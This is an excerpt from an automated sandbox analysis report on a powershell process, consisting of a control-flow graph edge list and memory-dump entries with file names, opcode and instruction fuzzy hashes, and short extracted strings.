388->392 389->375 396 7ffd9b861771-7ffd9b86177f 392->396 397 7ffd9b861789-7ffd9b86178f 392->397 402 7ffd9b8619c6-7ffd9b8619d7 394->402 395->394 396->397 405 7ffd9b861781-7ffd9b861787 396->405 397->386 399 7ffd9b861795-7ffd9b861798 397->399 403 7ffd9b8617e1 399->403 404 7ffd9b86179a-7ffd9b8617ad 399->404 414 7ffd9b8619e0-7ffd9b8619ef 402->414 415 7ffd9b8619d9 402->415 407 7ffd9b8617e3-7ffd9b8617e5 403->407 404->375 416 7ffd9b8617b3-7ffd9b8617bd 404->416 405->397 407->386 412 7ffd9b8617eb-7ffd9b8617ee 407->412 417 7ffd9b8617f0-7ffd9b8617f9 412->417 418 7ffd9b861805-7ffd9b861809 412->418 423 7ffd9b8619f1 414->423 424 7ffd9b8619f8-7ffd9b861a75 414->424 415->414 421 7ffd9b8617bf-7ffd9b8617d4 416->421 422 7ffd9b8617d6-7ffd9b8617df 416->422 417->418 418->386 427 7ffd9b86180f-7ffd9b861815 418->427 421->422 422->407 423->424 428 7ffd9b861ae8-7ffd9b861af2 424->428 429 7ffd9b861a77-7ffd9b861a87 424->429 430 7ffd9b861831-7ffd9b861837 427->430 431 7ffd9b861817-7ffd9b861824 427->431 436 7ffd9b861af4-7ffd9b861af9 428->436 437 7ffd9b861afc-7ffd9b861b41 428->437 439 7ffd9b861a94-7ffd9b861aaa 429->439 440 7ffd9b861a89-7ffd9b861a92 429->440 433 7ffd9b861853-7ffd9b861890 430->433 434 7ffd9b861839-7ffd9b861846 430->434 431->430 445 7ffd9b861826-7ffd9b86182f 431->445 460 7ffd9b861892-7ffd9b8618a7 433->460 461 7ffd9b8618a9-7ffd9b8618ba 433->461 434->433 446 7ffd9b861848-7ffd9b861851 434->446 443 7ffd9b861afa-7ffd9b861afb 436->443 439->443 454 7ffd9b861aac-7ffd9b861ae5 439->454 440->439 445->430 446->433 460->461
                    Memory Dump Source
                    • Source File: 00000008.00000002.1777020577.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ffd9b860000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 67ab2c6c809fbb5975fd6fba33610441162aa2db27beef49c5c1f176b4f0a09f
                    • Instruction ID: 3c18014d5c362b11b2115eb8ea416edad03b87a4f406b32303605dcaf93bbe85
                    • Opcode Fuzzy Hash: 67ab2c6c809fbb5975fd6fba33610441162aa2db27beef49c5c1f176b4f0a09f
                    • Instruction Fuzzy Hash: 38122721A0FBC94FE3A6977858355B87BE1EF56210B4A01FBD089CB1E3DD189D06C392
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: eI_^
                    • API String ID: 0-3408774493
                    • Opcode ID: f1dd9b56219d70020d906c6cca416a592d544265d579cedc844bdbe8448e1c18
                    • Instruction ID: 163e48c58e321faf968ae4538ca35a3e45c8182d279eb6f0e56c16fe72e01e04
                    • Opcode Fuzzy Hash: f1dd9b56219d70020d906c6cca416a592d544265d579cedc844bdbe8448e1c18
                    • Instruction Fuzzy Hash: 50220631B1DB495BE76CEA68946267973C2FF98700F51427DE04EC33E3DE29B9028681
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: d
                    • API String ID: 0-2564639436
                    • Opcode ID: cb83190e0d7e595e69c20d33c32ba2d556f1b539183fa2ed1c1d5ff379f381c8
                    • Instruction ID: 25c0005e82c0bed385a759161805b214142bb93113c91e1f514179cee957bf7b
                    • Opcode Fuzzy Hash: cb83190e0d7e595e69c20d33c32ba2d556f1b539183fa2ed1c1d5ff379f381c8
                    • Instruction Fuzzy Hash: C3125131A1DB4A4FEB29EA6884615B1B7E0FF51310B1547BEC09BC75B7EE24B9038780
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: NK_^
                    • API String ID: 0-2544938843
                    • Opcode ID: 6cd53f438e7c9d06d56be2e8306b9b27320edfdec11219b68a178aa179e55130
                    • Instruction ID: 249e0e6f017ccef4c1b3c3c3ce777f796bdfd0c95a0f0f5719767b66cc097a70
                    • Opcode Fuzzy Hash: 6cd53f438e7c9d06d56be2e8306b9b27320edfdec11219b68a178aa179e55130
                    • Instruction Fuzzy Hash: CCD15717B0EA9A1EE325B2AC78B15FC7B51DF41324B0943FBE19D8A0E7CE08644687D1
                    Memory Dump Source
                    • Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e5e69b307b3b64a0b68abed1e387f617002bfbc60f6b5d3df6c784e9e2560abf
                    • Instruction ID: c9d972125e249dc4cfef05194b1b9a471453c1ba62fad4d18224588d94850893
                    • Opcode Fuzzy Hash: e5e69b307b3b64a0b68abed1e387f617002bfbc60f6b5d3df6c784e9e2560abf
                    • Instruction Fuzzy Hash: 89413F67A0F7D61FE76256BD5CF90D53F50EE9267870E03FBC4D4860F3A90A290A8251